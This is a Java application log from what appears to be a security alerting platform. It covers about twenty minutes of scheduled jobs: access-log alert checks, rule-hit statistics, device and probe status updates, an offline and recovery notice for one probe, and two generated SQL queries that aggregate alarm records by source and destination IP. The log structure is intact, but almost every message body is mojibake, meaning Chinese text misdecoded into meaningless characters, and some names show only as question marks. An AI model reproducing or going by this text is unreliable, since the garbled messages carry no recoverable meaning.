2026-05-19 11:30:00.917 [log-processor-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:31:00.011 [scheduling-8] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:31:00.011 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T11:31:00.011
2026-05-19 11:31:00.012 [log-processor-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:31:00.229 [scheduling-8] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:31:00.231 [log-processor-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:31:00.461 [scheduling-8] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:31:00.464 [log-processor-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:31:00.663 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 0 м¼
2026-05-19 11:31:00.663 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 11:31:00.663 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ0
2026-05-19 11:31:00.815 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 11:31:00.815 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 11:31:00.817 [scheduling-5] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹0ʱ806ms
2026-05-19 11:32:00.003 [scheduling-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:32:00.004 [log-processor-4] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:32:00.236 [log-processor-4] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:32:00.236 [scheduling-7] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:32:00.496 [log-processor-4] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:32:00.511 [scheduling-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:33:00.003 [scheduling-8] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:33:00.004 [log-processor-5] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:33:00.222 [scheduling-8] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:33:00.222 [log-processor-5] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:33:00.453 [log-processor-5] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:33:00.457 [scheduling-8] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:34:00.011 [scheduling-5] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:34:00.012 [log-processor-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:34:00.231 [log-processor-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:34:00.233 [scheduling-5] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:34:00.472 [scheduling-5] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:34:00.477 [log-processor-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:35:00.005 [scheduling-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:35:00.005 [log-processor-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:35:00.079 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 11:35:00.157 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ0ʱ78ms
2026-05-19 11:35:00.157 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T11:35:00.157
2026-05-19 11:35:00.157 [scheduling-1] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T11:35:00.157
2026-05-19 11:35:00.230 [log-processor-7] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:35:00.230 [scheduling-7] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:35:00.482 [scheduling-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:35:00.488 [log-processor-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:35:00.585 [scheduling-1] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 11:35:00.586 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 429ms
2026-05-19 11:36:00.013 [scheduling-10] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:36:00.013 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T11:36:00.013
2026-05-19 11:36:00.014 [log-processor-8] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:36:00.238 [scheduling-10] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:36:00.238 [log-processor-8] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:36:00.469 [scheduling-10] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:36:00.516 [log-processor-8] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:36:00.667 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 0 м¼
2026-05-19 11:36:00.667 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 11:36:00.667 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ0
2026-05-19 11:36:00.811 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 11:36:00.811 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 11:36:00.811 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹0ʱ798ms
2026-05-19 11:37:00.010 [scheduling-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:37:00.010 [log-processor-9] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:37:00.230 [scheduling-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:37:00.231 [log-processor-9] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:37:00.541 [scheduling-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:37:00.544 [log-processor-9] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:38:00.009 [scheduling-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:38:00.009 [log-processor-10] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:38:00.231 [log-processor-10] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:38:00.239 [scheduling-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:38:00.518 [log-processor-10] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:38:00.864 [scheduling-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:38:01.705 [scheduling-6] INFO c.c.s.RealtimeAnalysisScheduler - ִй: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, nextTime=2026-05-19T11:38, now=2026-05-19T11:38:01.484
2026-05-19 11:38:01.705 [scheduling-6] INFO c.c.s.impl.AnalysisRuleServiceImpl - ִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 11:38:02.142 [scheduling-6] INFO c.c.s.impl.RealtimeAnalysisEngine - ڲѯΧ: ڴС=10mѯʱ䷶Χ=[2026-05-19 11:28:00, 2026-05-19 11:38:00]
2026-05-19 11:38:02.142 [scheduling-6] INFO c.c.s.impl.RealtimeAnalysisEngine - ʼִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, batchNo=20260519113801852, windowType=tumble, dataStartTime=2026-05-19 11:28:00, dataEndTime=2026-05-19 11:38:00
2026-05-19 11:38:03.349 [scheduling-6] INFO c.c.s.impl.RealtimeAnalysisEngine - ɵSQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 11:28:00' AND log_time < '2026-05-19 11:38:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 11:38:03.796 [scheduling-6] INFO c.c.s.impl.RealtimeAnalysisEngine - ִгɹ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 11:38:04.098 [scheduling-6] INFO c.c.s.i.RuleExecutionTimeServiceImpl - ¹´ִʱ䣬ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, windowType=tumble, nextExecuteTime=2026-05-19 11:48:00
2026-05-19 11:38:04.098 [scheduling-6] INFO c.c.s.RealtimeAnalysisScheduler - εִй: 1, : 0
2026-05-19 11:39:00.013 [scheduling-5] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:39:00.013 [log-processor-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:39:00.229 [log-processor-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:39:00.234 [scheduling-5] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:39:00.564 [log-processor-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:39:00.564 [scheduling-5] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:40:00.013 [scheduling-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:40:00.013 [scheduling-9] INFO c.c.s.ProbeStatusCheckScheduler - ========== ʼ̽״̬ ==========
2026-05-19 11:40:00.013 [log-processor-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:40:00.087 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 11:40:00.161 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ0ʱ74ms
2026-05-19 11:40:00.161 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T11:40:00.161
2026-05-19 11:40:00.162 [scheduling-5] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T11:40:00.162
2026-05-19 11:40:00.233 [scheduling-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:40:00.235 [log-processor-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:40:00.382 [scheduling-9] INFO c.c.service.WecomNotificationService - ΢֪ͨɹ, ID: 83, : probe_offline, : ̽-1
2026-05-19 11:40:00.382 [scheduling-9] WARN c.c.service.WecomNotificationService - ΢Ÿ澯֪ͨ - : ̽-1, : probe_offline, ȼ: 4, : ̽߸澯
̽ID: 1
̽: ????????-01
̽IP: 192.168.0.124
汾: V1.0.0-20260509
ʱ: 2026-05-19 11:40:00
: 2026-05-19 11:29:05
: ̽Ƿ
2026-05-19 11:40:00.382 [scheduling-9] INFO c.c.service.ProbeHeartbeatService - ̽߸澯ɹ, ֪ͨID: 83
2026-05-19 11:40:00.382 [scheduling-9] WARN c.c.service.ProbeHeartbeatService - ̽ 1 ߣʱ: 2026-05-19T11:29:05.628
2026-05-19 11:40:00.456 [scheduling-9] WARN c.c.s.ProbeStatusCheckScheduler - ̽״̬ɣ 1 ̽, ֵ: 10, ʱ: 443ms
2026-05-19 11:40:00.457 [scheduling-9] WARN c.c.s.ProbeStatusCheckScheduler - ̽: collectId=1, ip=192.168.0.124, name=????????-01
2026-05-19 11:40:00.472 [scheduling-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:40:00.472 [log-processor-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:40:00.572 [scheduling-5] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 11:40:00.573 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 412ms
2026-05-19 11:40:00.602 [scheduling-9] INFO c.c.s.ProbeStatusCheckScheduler - ̽ͳ: =1, =0, =1
2026-05-19 11:40:00.602 [scheduling-9] INFO c.c.s.ProbeStatusCheckScheduler - ========== ̽״̬ ==========
2026-05-19 11:41:00.002 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T11:41:00.002
2026-05-19 11:41:00.002 [log-processor-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:41:00.002 [scheduling-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:41:00.226 [scheduling-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:41:00.226 [log-processor-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:41:00.533 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 0 м¼
2026-05-19 11:41:00.533 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 11:41:00.533 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ0
2026-05-19 11:41:00.541 [scheduling-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:41:00.551 [log-processor-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:41:00.685 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 11:41:00.685 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 11:41:00.685 [scheduling-6] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹0ʱ683ms
2026-05-19 11:42:00.002 [scheduling-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:42:00.002 [log-processor-4] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:42:00.219 [scheduling-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:42:00.220 [log-processor-4] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:42:00.546 [scheduling-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:42:00.555 [log-processor-4] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:43:00.001 [scheduling-8] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:43:00.001 [log-processor-5] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:43:00.221 [scheduling-8] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:43:00.222 [log-processor-5] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:43:00.443 [scheduling-8] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:43:00.552 [log-processor-5] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:44:00.007 [scheduling-5] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:44:00.007 [log-processor-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:44:00.234 [log-processor-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:44:00.243 [scheduling-5] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:44:00.870 [log-processor-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:44:00.871 [scheduling-5] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:45:00.004 [log-processor-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:45:00.004 [scheduling-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:45:00.078 [scheduling-7] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 11:45:00.165 [scheduling-7] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ0ʱ87ms
2026-05-19 11:45:00.165 [scheduling-7] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T11:45:00.165
2026-05-19 11:45:00.165 [scheduling-7] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T11:45:00.165
2026-05-19 11:45:00.223 [log-processor-7] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:45:00.226 [scheduling-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:45:00.456 [log-processor-7] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:45:00.548 [scheduling-7] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 11:45:00.549 [scheduling-7] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 384ms
2026-05-19 11:45:00.816 [scheduling-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:46:00.010 [scheduling-4] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:46:00.010 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T11:46:00.010
2026-05-19 11:46:00.010 [log-processor-8] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:46:00.232 [log-processor-8] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:46:00.233 [scheduling-4] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:46:00.467 [log-processor-8] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:46:00.472 [scheduling-4] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:46:00.693 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_data ͳƵ 0 м¼
2026-05-19 11:46:00.693 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - syslog_normal_alarm ͳƵ 0 м¼
2026-05-19 11:46:00.693 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ϲҪµĹ0
2026-05-19 11:46:00.845 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ǰ״̬Ĺ174
2026-05-19 11:46:00.845 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ʼ£1741
2026-05-19 11:46:00.845 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ʱɣ¹0ʱ835ms
2026-05-19 11:46:28.815 [http-nio-8089-exec-9] INFO c.c.service.WecomNotificationService - ΢֪ͨɹ, ID: 84, : probe_recovery, : ָ̽-1
2026-05-19 11:46:28.815 [http-nio-8089-exec-9] WARN c.c.service.WecomNotificationService - ΢Ÿ澯֪ͨ - : ָ̽-1, : probe_recovery, ȼ: 1, : ָ֪̽ͨ
̽ID: 1
̽: ????????-01
̽IP: 192.168.0.124
ָʱ: 2026-05-19 11:46:28
״̬: ѻָ
2026-05-19 11:46:28.815 [http-nio-8089-exec-9] INFO c.c.service.ProbeHeartbeatService - ָ֪̽ͨɹ, ֪ͨID: 84
2026-05-19 11:46:28.815 [http-nio-8089-exec-9] INFO c.c.service.ProbeHeartbeatService - ̽ 1 ѻָ
2026-05-19 11:47:00.011 [scheduling-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:47:00.011 [log-processor-9] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:47:00.230 [scheduling-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:47:00.233 [log-processor-9] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:47:00.483 [scheduling-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:47:00.485 [log-processor-9] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:48:00.003 [scheduling-6] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:48:00.003 [log-processor-10] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:48:00.224 [log-processor-10] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:48:00.227 [scheduling-6] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:48:00.490 [log-processor-10] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:48:00.492 [scheduling-6] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:48:07.792 [scheduling-4] INFO c.c.s.RealtimeAnalysisScheduler - ִй: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, nextTime=2026-05-19T11:48, now=2026-05-19T11:48:07.564
2026-05-19 11:48:07.792 [scheduling-4] INFO c.c.s.impl.AnalysisRuleServiceImpl - ִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 11:48:08.241 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - ڲѯΧ: ڴС=10mѯʱ䷶Χ=[2026-05-19 11:38:00, 2026-05-19 11:48:00]
2026-05-19 11:48:08.241 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - ʼִʵʱ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, batchNo=20260519114807942, windowType=tumble, dataStartTime=2026-05-19 11:38:00, dataEndTime=2026-05-19 11:48:00
2026-05-19 11:48:09.462 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - ɵSQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 11:38:00' AND log_time < '2026-05-19 11:48:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 11:48:09.927 [scheduling-4] INFO c.c.s.impl.RealtimeAnalysisEngine - ִгɹ: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 11:48:10.230 [scheduling-4] INFO c.c.s.i.RuleExecutionTimeServiceImpl - ¹´ִʱ䣬ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=--V2, windowType=tumble, nextExecuteTime=2026-05-19 11:58:00
2026-05-19 11:48:10.230 [scheduling-4] INFO c.c.s.RealtimeAnalysisScheduler - εִй: 1, : 0
2026-05-19 11:49:00.000 [scheduling-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:49:00.010 [log-processor-1] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:49:00.218 [scheduling-3] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:49:00.238 [log-processor-1] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:49:00.507 [log-processor-1] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:49:00.523 [scheduling-3] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:50:00.006 [scheduling-3] INFO c.c.s.ProbeStatusCheckScheduler - ========== ʼ̽״̬ ==========
2026-05-19 11:50:00.006 [scheduling-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:50:00.006 [log-processor-2] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:50:00.080 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - ʼִ豸ͳƸ...
2026-05-19 11:50:00.156 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - 豸ͳƸɣ0ʱ76ms
2026-05-19 11:50:00.156 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - ʼִɼ̽ʱ£ʱ: 2026-05-19T11:50:00.156
2026-05-19 11:50:00.156 [scheduling-4] INFO c.c.s.DeviceCollectTaskUpdateService - ʼɼʱǰʱ: 2026-05-19T11:50:00.156
2026-05-19 11:50:00.229 [scheduling-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:50:00.229 [scheduling-3] INFO c.c.s.ProbeStatusCheckScheduler - ̽״̬ɣ̽, ʱ: 223ms
2026-05-19 11:50:00.229 [log-processor-2] INFO c.c.service.AccessLogAlertService - 1 õ
2026-05-19 11:50:00.374 [scheduling-3] INFO c.c.s.ProbeStatusCheckScheduler - ̽ͳ: =1, =1, =0
2026-05-19 11:50:00.374 [scheduling-3] INFO c.c.s.ProbeStatusCheckScheduler - ========== ̽״̬ ==========
2026-05-19 11:50:00.470 [scheduling-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:50:00.570 [scheduling-4] INFO c.c.s.DeviceCollectTaskUpdateService - ɣܼ: 48Ѹ: 1
2026-05-19 11:50:00.570 [scheduling-4] INFO c.c.service.DeviceStatsUpdateService - ɼ̽ʱɣʱ: 414ms
2026-05-19 11:50:00.833 [log-processor-2] INFO c.c.service.AccessLogAlertService - ûзµ־ݣϴδʱ: 2026-05-19T11:27:36.549
2026-05-19 11:51:00.013 [log-processor-3] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:51:00.013 [scheduling-9] INFO c.c.s.NormalizeRuleHitTimeService - ʼִзʱʱ䣺2026-05-19T11:51:00.013
2026-05-19 11:51:00.013 [scheduling-7] INFO c.c.service.AccessLogAlertService - ʼִз־
2026-05-19 11:51:00.237 [scheduling-7] INFO c.c.service.AccessLogAlertService - 1 õ
